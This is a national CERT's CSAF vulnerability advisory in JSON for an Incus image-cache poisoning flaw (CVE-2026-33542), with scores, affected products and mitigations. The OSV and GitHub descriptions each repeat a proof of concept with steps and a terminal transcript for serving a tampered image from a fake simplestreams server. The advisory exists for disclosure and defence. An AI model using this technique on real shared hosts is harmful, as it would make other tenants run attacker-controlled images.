{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-33542", "tracking": { "current_release_date": "2026-04-03T12:27:48.392957Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-33542", "initial_release_date": "2026-03-26T23:24:52.653505Z", "revision_history": [ { "date": "2026-03-26T23:24:52.653505Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (1).| CWES updated (1)." }, { "date": "2026-03-26T23:24:54.450464Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-26T23:38:45.984249Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (1).| CWES updated (1)." }, { "date": "2026-03-26T23:38:53.089858Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-27T06:43:22.399440Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| Products connected (1)." }, { "date": "2026-03-27T06:43:27.727118Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-27T07:35:12.521741Z", "number": "7", "summary": "NCSC Score updated." }, { "date": "2026-03-27T19:41:52.184212Z", "number": "8", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1).| Vendor_assessment created." }, { "date": "2026-03-27T19:41:57.168159Z", "number": "9", "summary": "NCSC Score updated." }, { "date": "2026-03-27T19:47:35.849901Z", "number": "10", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (7).| CWES updated (1)." }, { "date": "2026-03-27T19:47:46.829885Z", "number": "11", "summary": "NCSC Score updated." }, { "date": "2026-03-27T20:56:43.479741Z", "number": "12", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-28T07:41:31.868906Z", "number": "13", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (8).| CWES updated (1)." }, { "date": "2026-03-28T07:41:33.677923Z", "number": "14", "summary": "NCSC Score updated." }, { "date": "2026-03-30T12:38:47.520947Z", "number": "15", "summary": "Unknown change." }, { "date": "2026-03-30T12:38:49.962187Z", "number": "16", "summary": "NCSC Score updated." }, { "date": "2026-03-30T19:24:56.656805Z", "number": "17", "summary": "CVSS created.| Products created (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-30T19:25:05.012319Z", "number": "18", "summary": "NCSC Score updated." }, { "date": "2026-03-31T12:19:58.449802Z", "number": "19", "summary": "Source connected.| CVE status created. (valid)| Description created for source.| Products connected (2).| CWES updated (1)." }, { "date": "2026-03-31T12:20:00.232691Z", "number": "20", "summary": "NCSC Score updated." }, { "date": "2026-03-31T19:06:21.496374Z", "number": "21", "summary": "CWES updated (1)." }, { "date": "2026-04-01T00:43:20.089601Z", "number": "22", "summary": "Products connected (1).| Product Identifiers created (1).| Products removed (1)." }, { "date": "2026-04-01T00:43:29.078253Z", "number": "23", "summary": "NCSC Score updated." }, { "date": "2026-04-01T12:21:52.251960Z", "number": "24", "summary": "Product Remediations created (2)." }, { "date": "2026-04-01T12:21:56.916641Z", "number": "25", "summary": "NCSC Score updated." }, { "date": "2026-04-03T12:27:46.927638Z", "number": "26", "summary": "NCSC Score updated." } ], "status": "interim", "version": "26" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:microsoft/*", "product": { "name": "vers:microsoft/*", "product_id": "CSAFPID-5956314", "product_identification_helper": { "cpe": "cpe:2.3:a:microsoft:azl3_telegraf_1.31.0-15:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "azl3 telegraf 1.31.0-15 on Azure Linux 3.0" }, { "branches": [ { "category": "product_version_range", "name": "vers:microsoft/*", "product": { "name": "vers:microsoft/*", "product_id": "CSAFPID-5956312", "product_identification_helper": { "cpe": "cpe:2.3:a:microsoft:cbl2_telegraf_1.29.4-21:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "cbl2 telegraf 1.29.4-21 on CBL Mariner 2.0" } ], "category": "product_family", "name": "Open Source Software" } ], "category": "vendor", "name": "Microsoft" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<6.23.0", "product": { "name": "vers:unknown/<6.23.0", "product_id": "CSAFPID-5965579", "product_identification_helper": { "cpe": "cpe:2.3:a:linuxcontainers:incus:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "incus" } ], "category": "vendor", "name": "linuxcontainers" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<6.23.0", "product": { "name": "vers:unknown/<6.23.0", "product_id": "CSAFPID-5919453" } }, { "category": "product_version_range", "name": "vers:unknown/>=0|<6.23.0", "product": { "name": "vers:unknown/>=0|<6.23.0", "product_id": "CSAFPID-5944290" } } ], "category": "product_name", "name": "incus" } ], "category": "vendor", "name": "lxc" }, { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:deb/5.0.2-5+deb12u4", "product": { "name": "vers:deb/5.0.2-5+deb12u4", "product_id": "CSAFPID-5969890", "product_identification_helper": { "purl": "pkg:deb/debian/lxd@5.0.2-5+deb12u4?distro=bookworm" } } } ], "category": "product_name", "name": "lxd" } ], "category": "product_family", "name": "bookworm" } ], "category": "vendor", "name": "Debian" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-33542", "cwe": { "id": "CWE-295", "name": "Improper Certificate Validation" }, "notes": [ { "category": "description", "text": "Incus is a system container and virtual machine manager. Prior to version 6.23.0, a lack of validation of the image fingerprint when downloading from simplestreams image servers opens the door to image cache poisoning and under very narrow circumstances exposes other tenants to running attacker controlled images rather than the expected one. Version 6.23.0 patches the issue.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33542" }, { "category": "description", "text": "Incus is a system container and virtual machine manager. Prior to version 6.23.0, a lack of validation of the image fingerprint when downloading from simplestreams image servers opens the door to image cache poisoning and under very narrow circumstances exposes other tenants to running attacker controlled images rather than the expected one. Version 6.23.0 patches the issue.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33542.json" }, { "category": "description", "text": "Incus is a system container and virtual machine manager. Prior to version 6.23.0, a lack of validation of the image fingerprint when downloading from simplestreams image servers opens the door to image cache poisoning and under very narrow circumstances exposes other tenants to running attacker controlled images rather than the expected one. Version 6.23.0 patches the issue.", "title": "debian - https://security-tracker.debian.org/tracker/CVE-2026-33542" }, { "category": "description", "text": "A flaw was found in Incus, a system container and virtual machine manager. A remote attacker could exploit a lack of validation of image fingerprints when downloading from simplestreams image servers. This vulnerability, under specific conditions, could lead to image cache poisoning, allowing an attacker to expose other tenants to running their controlled images instead of the expected ones.\nThis Important vulnerability in Incus, a system container and virtual machine manager, stems from insufficient image fingerprint validation during downloads from simplestreams image servers. Under specific conditions, this could lead to image cache poisoning, allowing an attacker to expose other tenants to running controlled images. This issue primarily affects community projects such as Fedora.", "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33542.json" }, { "category": "description", "text": "### Summary\nA lack of validation of the image fingerprint when downloading from simplestreams image servers opens the door to image cache poisoning and under very narrow circumstances exposes other tenants to running attacker controlled images rather than the expected one.\n\n### Details\nIncus image fingerprints are computed as the SHA256 of the concatenated image files.\nWhen downloading from a public image server using a simplestreams index, Incus requires an HTTPS connection and validates the SHA256 of the individual files but is lacking validation that the concatenated hash of the files matches the fingerprint listed in the simplestreams index.\n\nThis missing check allows an attacker with access to an Incus environment lacking suitable image source restrictions (`restricted.image.server` or equivalent firewall rules) to cause Incus to download from an attacker controlled image server which would provide different image files for an other well known image fingerprint.\n\nSuch an attack can be used to poison the global image cache, leading to another user on the system wanting to use the legitimate image to be provided the compromised one instead.\n\nFor this to be successful, the attacker requires:\n\n - Access to an Incus server\n - That server to NOT have been configured with `restricted.image.servers` or an equivalent firewall or HTTP proxy policy\n - Some ability to predict what image may be used by other users in the near future\n - Other users that are actively deploying new Incus instances on the system\n\nHaving to predict what image may be used in the future which doesn't have its legitimate copy already cached on the system (or somewhere within the cluster) makes this attack quite difficult to pull off. It's made even harder by not having any control as to when a given image may be used by another user.\n\nAn example of a somewhat easy target would be a server that's known to run ephemeral instances for Ci or build purposes, as those will get created very frequently and the images they use may be public knowledge, it would be possible to get a compromised image in place with the right timing:\n\n - Monitor the legitimate image server for a new image being published\n - Immediately create a compromised image with the same fingerprint on an attacker controlled image server\n - Get the target Incus environment to download that image BEFORE any legitimate instance creation had the time to pull the legitimate image\n\nBut this again assumes an environment lacking either `restricted.image.servers` or equivalent firewall or proxy policies.\n\n### Mitigation\nAs mentioned above, any server using `restricted.image.servers` in project configuration, as would be strongly recommended in multi-tenant environments will be immune to this attack. As would any server going through equivalent network restriction whether implemented through firewalling or through an HTTP proxy server.\n\nThe updated Incus versions will now validate not just the individual files during download but also that the hash of the concatenated files does match the image fingerprint, fully preventing such an attack in the future.\n\n### PoC\nTo create a PoC, simply download `https://images.linuxcontainers.org/streams/v1/{index,images}.json` and `https://images.linuxcontainers.org/images/DISTRO/RELEASE/ARCH/default/NEWEST/{incus.tar.xz,rootfs.squashfs}` or similar paths, put them in suitable locations in a folder, and then use a server to serve them through https. The TLS certificate used by the server may need to be signed by a trusted CA of the client system.\n\nThen change the content of `rootfs.squashfs` by `unsquashfs`/`mksquashfs`, add one line in `/root/.bashrc`: `echo 'PoC: hacked!'`, and then update corresponding `sha256` and `size` fields for that individual file in `images.json`.\n\nUsing `incus-simplestreams` first and then altering the `combined_xxx` fields should also be OK.\n\nAfter that, check the following commands:\n\n```\n$ incus remote add poc https://TESTSERVER:4443 --protocol simplestreams\n$ incus remote list \n+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+\n| NAME | URL | PROTOCOL | AUTH TYPE | PUBLIC | STATIC | GLOBAL |\n+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+\n| images | https://images.linuxcontainers.org | simplestreams | none | YES | NO | NO |\n+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+\n| local (current) | unix:// | incus | file access | NO | YES | NO |\n+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+\n| poc | https://TESTSERVER:4443 | simplestreams | none | YES | NO | NO |\n+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+\n$ incus image list \n+-------+-------------+--------+-------------+--------------+------+------+-------------+\n| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |\n+-------+-------------+--------+-------------+--------------+------+------+-------------+\n$ incus image list images:debian/trixie -c lFpdasu\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | SIZE | UPLOAD DATE |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13 (7 more) | 8dad70759d54410e4e8ad84164f6a9d8bda3af753a54441365ff1476f065999c | yes | Debian trixie amd64 (20260320_05:24) | x86_64 | 341.13MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13 (7 more) | 945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369 | yes | Debian trixie amd64 (20260320_05:24) | x86_64 | 94.70MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/arm64 (3 more) | 41b4f8849cfc8d22a6b9cd86790602a43f67a9ec2c1d7e13a0b3ecf7b7d6663e | yes | Debian trixie arm64 (20260320_05:24) | aarch64 | 339.27MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/arm64 (3 more) | fda543def4b41f65511696ec0350d899dad5374956d18078697f58d1c466bae4 | yes | Debian trixie arm64 (20260320_05:24) | aarch64 | 92.25MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/armhf (3 more) | 77ef0a077759eab7690b1401bfbec78360d2a0462ee89fa3de86b899465adedb | yes | Debian trixie armhf (20260320_05:24) | armv7l | 84.14MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud (3 more) | 2ee3da00ca407ea98e1b84a2d5b1561c0fffb0281b05035e307e5029cdaa5532 | yes | Debian trixie amd64 (20260320_05:24) | x86_64 | 130.17MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud (3 more) | 108ed9a36105c37ba5412a880b5c39653536453189789aa101e46591de620d56 | yes | Debian trixie amd64 (20260320_05:24) | x86_64 | 374.30MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud/arm64 (1 more) | cfb51c473e221b6c8b62a21808bd4f69ca4845108abfb14187fde8b79befbab3 | yes | Debian trixie arm64 (20260320_05:24) | aarch64 | 126.78MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud/arm64 (1 more) | ff2c2c62849d978dfad0cc1df54c0f55881a0edf3b31333c3b2a00413eaee1a5 | yes | Debian trixie arm64 (20260320_05:24) | aarch64 | 371.76MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud/armhf (1 more) | 8eb505d548265e371a3ab0d277f76986f0879e414a6a74af2f975cf3caffc565 | yes | Debian trixie armhf (20260320_05:24) | armv7l | 117.92MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud/riscv64 (1 more) | dab5009031d0d03c8cfebb330a83baf950eb79b8277a5f071e0a81758d17b8b4 | yes | Debian trixie riscv64 (20260320_05:24) | riscv64 | 122.90MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/riscv64 (3 more) | 1fa5c6eaf7f3c107b96625b49bc2e4f00b077d949d349d9e3c412747ec492341 | yes | Debian trixie riscv64 (20260320_05:24) | riscv64 | 87.86MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n$ incus image copy poc:debian/trixie local:\nImage copied successfully! \n$ incus image list -c lFpdasu\n+-------+------------------------------------------------------------------+--------+--------------------------------------+--------------+-----------+----------------------+\n| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | SIZE | UPLOAD DATE |\n+-------+------------------------------------------------------------------+--------+--------------------------------------+--------------+-----------+----------------------+\n| | 945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369 | no | Debian trixie amd64 (20260320_05:24) | x86_64 | 105.09MiB | 2026/03/21 00:55 CST |\n+-------+------------------------------------------------------------------+--------+--------------------------------------+--------------+-----------+----------------------+\n$ incus launch images:debian/trixie\nLaunching the instance\nInstance name is: star-mollusk \n$ incus list \n+--------------+---------+------+------------------------------------------------+-----------+-----------+\n| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |\n+--------------+---------+------+------------------------------------------------+-----------+-----------+\n| star-mollusk | RUNNING | | fd42:115a:7a71:9748:1266:6aff:fe1a:d504 (eth0) | CONTAINER | 0 |\n+--------------+---------+------+------------------------------------------------+-----------+-----------+\n$ incus exec star-mollusk bash\nPoC: hacked!\nroot@star-mollusk:~# \nexit\n$ incus image export images:debian/trixie\nImage exported successfully! \n$ cat incus.tar.xz rootfs.squashfs | sha256sum\n945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369 -\n$ rm incus.tar.xz rootfs.squashfs\n$ incus image export poc:debian/trixie\nImage exported successfully! \n$ cat incus.tar.xz rootfs.squashfs | sha256sum\nd3ec6f76cc1e4e49479e52c69b3d71430748f7c86d1214f44893e131392ad002 -\n$ rm incus.tar.xz rootfs.squashfs\n$ incus image export local:945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369\nError: Image fingerprint doesn't match. Got d3ec6f76cc1e4e49479e52c69b3d71430748f7c86d1214f44893e131392ad002 expected 945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369\n$ incus image export poc:945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369\nImage exported successfully! \n$ cat incus.tar.xz rootfs.squashfs | sha256sum\nd3ec6f76cc1e4e49479e52c69b3d71430748f7c86d1214f44893e131392ad002 -\n```", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-p8mm-23gg-jc9r.json?alt=media" }, { "category": "description", "text": "### Summary\nA lack of validation of the image fingerprint when downloading from simplestreams image servers opens the door to image cache poisoning and under very narrow circumstances exposes other tenants to running attacker controlled images rather than the expected one.\n\n### Details\nIncus image fingerprints are computed as the SHA256 of the concatenated image files.\nWhen downloading from a public image server using a simplestreams index, Incus requires an HTTPS connection and validates the SHA256 of the individual files but is lacking validation that the concatenated hash of the files matches the fingerprint listed in the simplestreams index.\n\nThis missing check allows an attacker with access to an Incus environment lacking suitable image source restrictions (`restricted.image.server` or equivalent firewall rules) to cause Incus to download from an attacker controlled image server which would provide different image files for an other well known image fingerprint.\n\nSuch an attack can be used to poison the global image cache, leading to another user on the system wanting to use the legitimate image to be provided the compromised one instead.\n\nFor this to be successful, the attacker requires:\n\n - Access to an Incus server\n - That server to NOT have been configured with `restricted.image.servers` or an equivalent firewall or HTTP proxy policy\n - Some ability to predict what image may be used by other users in the near future\n - Other users that are actively deploying new Incus instances on the system\n\nHaving to predict what image may be used in the future which doesn't have its legitimate copy already cached on the system (or somewhere within the cluster) makes this attack quite difficult to pull off. It's made even harder by not having any control as to when a given image may be used by another user.\n\nAn example of a somewhat easy target would be a server that's known to run ephemeral instances for Ci or build purposes, as those will get created very frequently and the images they use may be public knowledge, it would be possible to get a compromised image in place with the right timing:\n\n - Monitor the legitimate image server for a new image being published\n - Immediately create a compromised image with the same fingerprint on an attacker controlled image server\n - Get the target Incus environment to download that image BEFORE any legitimate instance creation had the time to pull the legitimate image\n\nBut this again assumes an environment lacking either `restricted.image.servers` or equivalent firewall or proxy policies.\n\n### Mitigation\nAs mentioned above, any server using `restricted.image.servers` in project configuration, as would be strongly recommended in multi-tenant environments will be immune to this attack. As would any server going through equivalent network restriction whether implemented through firewalling or through an HTTP proxy server.\n\nThe updated Incus versions will now validate not just the individual files during download but also that the hash of the concatenated files does match the image fingerprint, fully preventing such an attack in the future.\n\n### PoC\nTo create a PoC, simply download `https://images.linuxcontainers.org/streams/v1/{index,images}.json` and `https://images.linuxcontainers.org/images/DISTRO/RELEASE/ARCH/default/NEWEST/{incus.tar.xz,rootfs.squashfs}` or similar paths, put them in suitable locations in a folder, and then use a server to serve them through https. The TLS certificate used by the server may need to be signed by a trusted CA of the client system.\n\nThen change the content of `rootfs.squashfs` by `unsquashfs`/`mksquashfs`, add one line in `/root/.bashrc`: `echo 'PoC: hacked!'`, and then update corresponding `sha256` and `size` fields for that individual file in `images.json`.\n\nUsing `incus-simplestreams` first and then altering the `combined_xxx` fields should also be OK.\n\nAfter that, check the following commands:\n\n```\n$ incus remote add poc https://TESTSERVER:4443 --protocol simplestreams\n$ incus remote list \n+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+\n| NAME | URL | PROTOCOL | AUTH TYPE | PUBLIC | STATIC | GLOBAL |\n+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+\n| images | https://images.linuxcontainers.org | simplestreams | none | YES | NO | NO |\n+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+\n| local (current) | unix:// | incus | file access | NO | YES | NO |\n+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+\n| poc | https://TESTSERVER:4443 | simplestreams | none | YES | NO | NO |\n+-----------------+------------------------------------+---------------+-------------+--------+--------+--------+\n$ incus image list \n+-------+-------------+--------+-------------+--------------+------+------+-------------+\n| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |\n+-------+-------------+--------+-------------+--------------+------+------+-------------+\n$ incus image list images:debian/trixie -c lFpdasu\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | SIZE | UPLOAD DATE |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13 (7 more) | 8dad70759d54410e4e8ad84164f6a9d8bda3af753a54441365ff1476f065999c | yes | Debian trixie amd64 (20260320_05:24) | x86_64 | 341.13MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13 (7 more) | 945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369 | yes | Debian trixie amd64 (20260320_05:24) | x86_64 | 94.70MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/arm64 (3 more) | 41b4f8849cfc8d22a6b9cd86790602a43f67a9ec2c1d7e13a0b3ecf7b7d6663e | yes | Debian trixie arm64 (20260320_05:24) | aarch64 | 339.27MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/arm64 (3 more) | fda543def4b41f65511696ec0350d899dad5374956d18078697f58d1c466bae4 | yes | Debian trixie arm64 (20260320_05:24) | aarch64 | 92.25MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/armhf (3 more) | 77ef0a077759eab7690b1401bfbec78360d2a0462ee89fa3de86b899465adedb | yes | Debian trixie armhf (20260320_05:24) | armv7l | 84.14MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud (3 more) | 2ee3da00ca407ea98e1b84a2d5b1561c0fffb0281b05035e307e5029cdaa5532 | yes | Debian trixie amd64 (20260320_05:24) | x86_64 | 130.17MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud (3 more) | 108ed9a36105c37ba5412a880b5c39653536453189789aa101e46591de620d56 | yes | Debian trixie amd64 (20260320_05:24) | x86_64 | 374.30MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud/arm64 (1 more) | cfb51c473e221b6c8b62a21808bd4f69ca4845108abfb14187fde8b79befbab3 | yes | Debian trixie arm64 (20260320_05:24) | aarch64 | 126.78MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud/arm64 (1 more) | ff2c2c62849d978dfad0cc1df54c0f55881a0edf3b31333c3b2a00413eaee1a5 | yes | Debian trixie arm64 (20260320_05:24) | aarch64 | 371.76MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud/armhf (1 more) | 8eb505d548265e371a3ab0d277f76986f0879e414a6a74af2f975cf3caffc565 | yes | Debian trixie armhf (20260320_05:24) | armv7l | 117.92MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/cloud/riscv64 (1 more) | dab5009031d0d03c8cfebb330a83baf950eb79b8277a5f071e0a81758d17b8b4 | yes | Debian trixie riscv64 (20260320_05:24) | riscv64 | 122.90MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n| debian/13/riscv64 (3 more) | 1fa5c6eaf7f3c107b96625b49bc2e4f00b077d949d349d9e3c412747ec492341 | yes | Debian trixie riscv64 (20260320_05:24) | riscv64 | 87.86MiB | 2026/03/20 08:00 CST |\n+----------------------------------+------------------------------------------------------------------+--------+----------------------------------------+--------------+-----------+----------------------+\n$ incus image copy poc:debian/trixie local:\nImage copied successfully! \n$ incus image list -c lFpdasu\n+-------+------------------------------------------------------------------+--------+--------------------------------------+--------------+-----------+----------------------+\n| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | SIZE | UPLOAD DATE |\n+-------+------------------------------------------------------------------+--------+--------------------------------------+--------------+-----------+----------------------+\n| | 945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369 | no | Debian trixie amd64 (20260320_05:24) | x86_64 | 105.09MiB | 2026/03/21 00:55 CST |\n+-------+------------------------------------------------------------------+--------+--------------------------------------+--------------+-----------+----------------------+\n$ incus launch images:debian/trixie\nLaunching the instance\nInstance name is: star-mollusk \n$ incus list \n+--------------+---------+------+------------------------------------------------+-----------+-----------+\n| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |\n+--------------+---------+------+------------------------------------------------+-----------+-----------+\n| star-mollusk | RUNNING | | fd42:115a:7a71:9748:1266:6aff:fe1a:d504 (eth0) | CONTAINER | 0 |\n+--------------+---------+------+------------------------------------------------+-----------+-----------+\n$ incus exec star-mollusk bash\nPoC: hacked!\nroot@star-mollusk:~# \nexit\n$ incus image export images:debian/trixie\nImage exported successfully! \n$ cat incus.tar.xz rootfs.squashfs | sha256sum\n945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369 -\n$ rm incus.tar.xz rootfs.squashfs\n$ incus image export poc:debian/trixie\nImage exported successfully! \n$ cat incus.tar.xz rootfs.squashfs | sha256sum\nd3ec6f76cc1e4e49479e52c69b3d71430748f7c86d1214f44893e131392ad002 -\n$ rm incus.tar.xz rootfs.squashfs\n$ incus image export local:945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369\nError: Image fingerprint doesn't match. Got d3ec6f76cc1e4e49479e52c69b3d71430748f7c86d1214f44893e131392ad002 expected 945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369\n$ incus image export poc:945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369\nImage exported successfully! \n$ cat incus.tar.xz rootfs.squashfs | sha256sum\nd3ec6f76cc1e4e49479e52c69b3d71430748f7c86d1214f44893e131392ad002 -\n```", "title": "github - https://api.github.com/advisories/GHSA-p8mm-23gg-jc9r" }, { "category": "description", "text": "Incus does not verify combined fingerprint when downloading images from simplestreams servers", "title": "microsoft - https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2026-Mar" }, { "category": "other", "text": "0.00038", "title": "EPSS" }, { "category": "other", "text": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:P/VC:L/VI:H/VA:N/SC:H/SI:L/SA:N", "title": "CVSSV4" }, { "category": "other", "text": "7.0", "title": "CVSSV4 base score" }, { "category": "other", "text": "4.8", "title": "NCSC Score" }, { "category": "other", "text": "VENDOR FIX as product remediation category", "title": "NCSC Score top increasing factors" }, { "category": "other", "text": "There is exploit data available from source Nvd, Exploit code publicly available, There is cvss data available from source a private source", "title": "NCSC Score top decreasing factors" }, { "category": "details", "text": "Severity: 3\n", "title": "Vendor assessment" } ], "product_status": { "first_fixed": [ "CSAFPID-5969890" ], "known_affected": [ "CSAFPID-5919453", "CSAFPID-5944290", "CSAFPID-5965579", "CSAFPID-5956312", "CSAFPID-5956314" ] }, "references": [ { "category": "external", "summary": "Source - nvd", "url": 